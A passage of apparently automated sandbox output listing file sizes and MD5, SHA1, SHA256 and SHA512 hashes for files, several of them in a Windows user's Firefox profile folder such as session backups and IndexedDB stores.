SHA512b964396f868f84b12fd3374fc6c655452f6b31e22447cc5579f25aa8f9c1a31f08125c5e8ab40f3c8186031e1253f5afd282df96ec399a39afc16580e70803e3
-
Filesize
4KB
MD57fdd52a1e7d03e5b6bb9650f14887179
SHA1164f291b91df4e4a7004f5b1a652401581737a43
SHA256f776cd59e2b329555599832d6a868abf8f38a893915c2b86b06089dfe13ea531
SHA5121941706f3122ebce4140fcbec01ab432150958929bba055bac86585bd7d9c5c474420210b41256c5b75c8679c994c5e6b9b8324e698ec5b5502bb323724156ac
-
Filesize
280B
MD541d220d4783f67d2b57beec20c135229
SHA16e97765e77920b6010fac2cb4abf1e3cea106541
SHA2565d1881e74d76b95bad59439bb5c7676258a4ae6b6d853074e93b5247cf1715dc
SHA512dc30ddc4c8cfe598de5e24bc88cebbe4256fbb21a0b1db6c2ec15311053e7d8be6a93a0bcfcfd8a02543f8b9cf9b15a5840154b272a2df71d59d7dfd80984ac0
-
Filesize
299B
MD5e4b66478ecde473b6d9c95d7a4350d37
SHA1cf125f3ec9060bf59a3e4449b0fb151eaad01c5e
SHA2564510c82fc9289533b0dbaf0a2a70a45589814c06be7e9adc395100ff18d5fc73
SHA5120fef6926821a19f686d0291db9e7efb1a60cd6d13d94d4cc6fc3eeb06be3807d697debde0a5a264b430d449482bb26666b8273c7342e99d592e9b516027c086d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6oaa036a.default-release\sessionCheckpoints.json
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6oaa036a.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD583ebe0f56683d0faad3c0891672b13cb
SHA1295971f9686360062bc8a996be4a6619f40c6eff
SHA256ef11fc324ecdb8615e2f07f5b8c0c67b009575f2fab87fb2f6f7abded173f329
SHA51230447e7667d04b5310f85ec7573ad3fe02878c3714fbaae347c7f9ec527a45aab76af86d86bd1f296de7bced7748ebde599b9d39253240e1833709457c321a94
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6oaa036a.default-release\shield-preference-experiments.json
Filesize18B
MD5285cdefb3f582c224291f7a2530f3c4e
SHA1f816c3e87aa007b6e6d31eb6a4618695a7d83439
SHA256704d28223a4320a853df4a19d48c7015cf79d56a5317cc3475b6305fa43dcc05
SHA5128f1decf1e4b5755fce8f165daae115f45d6890985c9c4bbb33a6f724cbfd26db75f6da06f9ef675de20fe755da9b7f55e5ee37124296a12a520a393da159bd58
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6oaa036a.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Filesize48KB
MD5bfafbb1d2182d9a84539655d259662ea
SHA1a689faae24751432ce4ce6e4b26854ac9b87b2bc
SHA2564252aaaeeb87416b92f4bd412f4b6a983919ad54a50afc3eb14a1b8a60f17050
SHA512ef5c7286458b85098db761596ed9a5034a9d7b642a6c2e1d026913f3879986b2d46d4a409cb27cff3e217baad4ab96e5a0fa81cef52c37c9a8da8edec3abeb93
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6oaa036a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize152KB
MD5df36fdaf3c8e99994803b2b75bba2581
SHA1b8c453175ce26786b9029b0279aec2c687939232
SHA25636716becd1acc1ff8edaf22df86ceb096df1ead3084d38226184c37c36d2dcbf
SHA51286f6f833a957d50b3f3f022f34bd814a6bb722708bcec1d3829a3f8ee810dbc9d078e723133012040f7c64f35ee7dd71c9b1e3ea5eb73d676fc947320d1a8b32
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6oaa036a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize224KB
MD55c36bf3d776d8aec4611db421be75477
SHA1d95775088afa13e89449f8c4ae04ca2d7bfb68a5
SHA256d35d8d3adacbc55ef590fe38c15f2e76d1c1bc3e6ac606b3d41c702e369fae6d
SHA512881c2b30ed36670bc81c004aa44309bc7d0d65cdbfbb5ceee29de2d9c9ad8710284187173db518c7a8a0cd4033a65f0266bd5290895bf765942c6ebad50ecbf1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6oaa036a.default-release\targeting.snapshot.json
Filesize4KB
MD5b959fbede10c4bebb844614c59ee0784
SHA119e53135a0ef07d9aac76b5dcad4456e1f816511
SHA256dc5f911ec14266b9c0fc1ca0c86773a612e882976f380036a044c3afcd6d64ed
SHA512edea7cb0fc01874599b98b1053d073978a0f91b4cfd5550a92881ac26fea61e32a33ea6a69d3102505fca50dc13fac7bea7a2e12539089d15443f7eecade0a48
-
Filesize
3.1MB
MD56a0bb84dcd837e83638f4292180bf5ab
SHA120e31ccffe1ac806e75ea839ea90b4c91e4322c5
SHA256e119fe767f3d10a387df1951d4b356384c5a9d0441b4034ddf7293c389a410b4
SHA512d0d61815c1ca73e4d1b8d5c3ea61e0572bfa9f6e984247b8e66c22e5591d61f766c6476c2686ce611917a56f2d4d8b8ddb4efcdbed707855e4190a2404eedcc5
-
Filesize
3KB
MD5d91b4197f868c202b4555007c0b2b7f0
SHA1672d5b5ad38f17f19078bb1d28b18c9741679ef3
SHA2564b9505c77850e7580d46477cc55ec54d51f092f279cef621dbc673d5c36f33f2
SHA512ea3a27c669b2515f9c46548c1b55e6732a5a6f9b0be8d8197d449dd3123e4cdd995f713a8f695bf8365460b11ffcfc7264be07f4bf1fb3b2be338af1ecc465a9
-
Filesize
3KB
MD5e1c03c3b3d89ce0980ad536a43035195
SHA134372b2bfe251ee880857d50c40378dc19db57a7
SHA256d2f3a053063b8bb6f66cee3e222b610321fa4e1611fc2faf6129c64d504d7415
SHA5126ea0233df4a093655387dae11e935fb410e704e742dbcf085c403630e6b034671c5235af15c21dfbb614e2a409d412a74a0b4ef7386d0abfffa1990d0f611c70
-
Filesize
4KB
MD57fc138b224b67a6eb18159ab1fd95788
SHA1a5b33973d3216b44d483ff27e765107fc9330928
SHA2566c67e08a4f35cf67a0785cedebf94c1c75bd77b0f687d62be46a2e31e567047b
SHA5124bc3d6cfe721cf0ec68cc44a1fc5eb3b6a58cdd43118b1aedd53f24a3354f679a3124e92037ff39acdbef6a627bf6d2a270a743e5c4dbbb158467581057e931e
-
Filesize
4KB
MD51b64cb6c8d05efe2f445d340e9579633
SHA1b4acc15d5c1790ba7b9866e24189816e2e4f8403
SHA256c16a068551332be9d4f8e5c667ccf29ab2fae9f339639ea34fdd8443cb6dd920
SHA512c3b25a79fb234ffe3d6e58fd51b1810f8b3cb3a153253d09c78e863c0b61745daec4d5ed31e91af6af7665ca9814c181d241fa00dfa31858f78339a3c609514b
-
Filesize
1.6MB
MD51cc56a21eea09e87d3b56f30c726f958
SHA1f0f05cf212f52f05ec59161c0e1e8807f4922211
SHA2563faf85bfe9992f9f95ee87e8c8db9fa88474dab5c8bb55349c80e4a34d097bbb
SHA512955c60b81901c2c5a49e1696d7ee7b207619b9e5435a79167d0e90c7c8e7a1acbbfe84d3170ae4557826700939e1801833c3eb69e5f8d0a6b12819cba7a0b5b3
-
Filesize
15KB
MD5f3ca8234f60eba24604b5a9390d2fed5
SHA133659140c3842d6753e4389aa49612333a0d166d
SHA256576911063b10114a4844a039c771bc4eef631a457ae3775d7645604ef2950f4f
SHA5125d9a931ccc18877ce1886d7813c7c10d31980874eda11aeea94a9298602b610c5b288e9622bb3f565545a5be61d22eec756cc1fd2c5fcf47e242a21d6d5f42bb
-
Filesize
1KB
MD568021a54d5165c029ddd3fb5f97256e8
SHA18f2873cff808344a5016066ad5819f19dd7d55e2
SHA256e184363db52edf82c90feaf5146f1d92b1c4074d354d33cab5d52cec6883ec35
SHA51266456789b4021333271bbdf78fd1be90584c584b949afa3345ed73bee4545a769007b9140da2883be46e41bfae224af82073ab0932c5ec347b35a1e7c74567c0
-
Filesize
37KB
MD57bc1928cd1d6ea2bce5fdb1fdeac0b3d
SHA12190fb9c9e2e4afd2db146028853462e39f48596
SHA2569fe0f7f2c11f583dba91dc8e002f77f0c27ca4ce5c6e913b8d8b113084fd7e60
SHA5123a74c4d96bba0119a8ce3e3c2a86bc0a00bbd34eb996e5533b95b8e962e516f13cc52d6dd038ce1e7fc43b974abff2354fe60b1a834c146ad14553d391d51240
-
Filesize
6KB
MD5d962f8855c14cc78d0dcecd2bd14f159
SHA14927a5f6a773f3e10e6cd30ff62ac0b0f424b75f
SHA256faba8fb6857a74c0b56cfe7ad26ec4a3ed182b21ffd09fe4f428d77dbc969ab4
SHA5122a1288179403686b7841237a34588a0dc93bbe852e18ab2971cc05f60b724a99a23f4c9f5fd34051d14a11a2ee05d372473d15e28c1462110e964cc25c0e9897
-
Filesize
129B
MD5e968b51e4546b799390dd8d26253dd65
SHA10b49584b1d8a37ea4549c5871f939f64b15b96ec
SHA25625abbd6014c1b00f27c5179bb5e32603dd1ca7895b032c8654b582eed3f85793
SHA5124ab61a2129326286ea1aaeeafa8c9abc549b8555e16505963daea7efb783a518864d3ad9cb472333cfbc24032deed28c81e1bb6ad40b9dc97c1daac48700b01b
-
Filesize
79KB
MD50c883b1d66afce606d9830f48d69d74b
SHA1fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5
-
Filesize
8KB
MD5cb8420e681f68db1bad5ed24e7b22114
SHA1416fc65d538d3622f5ca71c667a11df88a927c31
SHA2565850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf
-
Filesize
5.6MB
MD513b26b2c7048a92d6a843c1302618fad
SHA189c2dfc01ac12ef2704c7669844ec69f1700c1ca
SHA2561753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256
SHA512d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455
-
Filesize
49KB
MD56946486673f91392724e944be9ca9249
SHA1e74009983ced1fa683cda30b52ae889bc2ca6395
SHA256885fbe678b117e5e0eace7c64980f6072c31290eb36d0e14953d6a2d12eff9cd
SHA512e3241f85def0efefd36b3ffb6722ab025e8523082e4cf3e7f35ff86a9a452b5a50454c3b9530dfdad3929f74a6e42bf2a2cf35e404af588f778e0579345b38c9
-
Filesize
10KB
MD596509ab828867d81c1693b614b22f41d
SHA1c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
-
Filesize
4.9MB
MD53d375d10b594f69c51b80948ec0e4c03
SHA1439779b78363df27d5874efb256aa5e415e0b8b3
SHA2568f861c2089520549eb6c1eb3cba713a8316ffe9f3573199e27cb48bd5e1ca704
SHA512635d39a32aa3c01cf2d7c5910639da9dbc7f661daba92d0b6c6d543123aa84bfac86dc7c72d6f88ace93d4d2b520e5020094d11f8d78c6859ea68265e8dad560
-
Filesize
111KB
MD5ea257066a195cc1bc1ea398e239006b2
SHA1fce1cd214c17cf3a56233299bf8808a46b639ae1
SHA25681e95eaca372c94265746b08aac50120c45e6baae7c521a8a23dd0dfdc3b9410
SHA51257c01e41e30259632ffbe35a7c07cc8b81524ca26320605750a418e0e75f229d2704ae226106147d727fe6330bc5268f7a2a9838fa2e7b0178eadf056682a12f
-
Filesize
662KB
MD54ae02ce23e76c0d777a9000222e4336c
SHA14ad1cdcd30abc364dc93e671cec58461c1f7f2c2
SHA25687202ddd20d67f566b2e49c98ceea801f58f72e66b47e61f8daf0d70521546f5
SHA512c68eeac1bfe39ff7ce6d10c1e276ae98d5c7c56513bf0a172fb87da187671a3dbb02ff01fdeb588d819ae8ba2433e222a5e7dc1825675a0af78b7b4be1ef0c47
-
Filesize
54KB
MD5c9025b7c41ecf914e50db39dabb6e8ea
SHA10ceb705e7ebc933c43fd272c2b6a7645d185d9d3
SHA256efc67571d4adc9ff916e5c21f28333b772accd2ed0cf974f293ec5ceb5b41651
SHA512ee996504616805b1c0bf905aed97bdec04642fce08043f371369e7d955d31dbc78895d159d424e074ebb4756e465e3b01afe044676b36a9305e4070d6d0e9d05
-
Filesize
83KB
MD5a736e23ae291f6d3a848fdb1aaa7348f
SHA1b6d98379d5924c0b3afa1ce2d6de02234b1bef88
SHA256d00d806f1df7195c4d6b5757d90c3e81fdbf8d4f2efcbc895ee752af0b09b28c
SHA512bc8bc96dd0af4ba465ad0c260259080cc9b395f42e20e00713b950914016974cec0f56b6382b9b71ceb32ae54077f82ad13ffa036f4d4a67af4070903da337c8
-
Filesize
9KB
MD58d8e6c7952a9dc7c0c73911c4dbc5518
SHA19098da03b33b2c822065b49d5220359c275d5e94
SHA256feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278
SHA51291a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645
-
Filesize
32KB
MD541138d08c05c7c0fc7d23c2364d8d90b
SHA13abfe164faf8597e4c2a9f27883f0a31238bcb13
SHA2567e229099c42890098639bb0c37fe56ab5020b237884f039d3428a9d9018a84b2
SHA512aea8d6f1294d8ee418a14022f638b6334f7b16675fa92b3705cf6493d7a0371b7acfaa375fefddcc9d12f869087d7a78ff767a679ca684a235bd17528ae9df53
-
Filesize
83KB
MD506560b5e92d704395bc6dae58bc7e794
SHA1fbd3e4ae28620197d1f02bfc24adaf4ddacd2372
SHA2569eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d
SHA512b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3